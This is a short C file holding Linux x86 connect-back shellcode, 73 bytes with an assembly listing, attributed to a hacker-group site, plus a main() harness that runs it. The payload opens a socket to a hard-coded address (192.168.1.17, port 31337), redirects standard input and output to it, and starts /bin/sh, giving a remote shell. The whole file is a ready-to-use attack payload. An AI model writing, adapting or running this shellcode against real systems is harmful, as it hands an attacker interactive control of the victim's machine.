/* * (linux/x86) connect-back /bin/sh (port 31337) * 73 bytes * * http://www.gonullyourself.org * sToRm */ char shellcode[] = // <_start>: "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x53" // push %ebx "\x43" // inc %ebx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx "\xcd\x80" // int $0x80 "\x96" // xchg %eax,%esi "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x43" // inc %ebx "\x68\xc0\xa8\x01\x11" // push $0x1101a8c0 "\x66\x68\x7a\x69" // pushw $0x697a "\x66\x53" // push %bx "\x89\xe1" // mov %esp,%ecx "\x6a\x10" // push $0x10 "\x51" // push %ecx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\x43" // inc %ebx "\xcd\x80" // int $0x80 "\x87\xde" // xchg %ebx,%esi "\x6a\x03" // push $0x3 "\x59" // pop %ecx // : "\x49" // dec %ecx "\x6a\x3f" // push $0x3f "\x58" // pop %eax "\xcd\x80" // int $0x80 "\x75\xf8" // jne 804808e "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 ; int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); }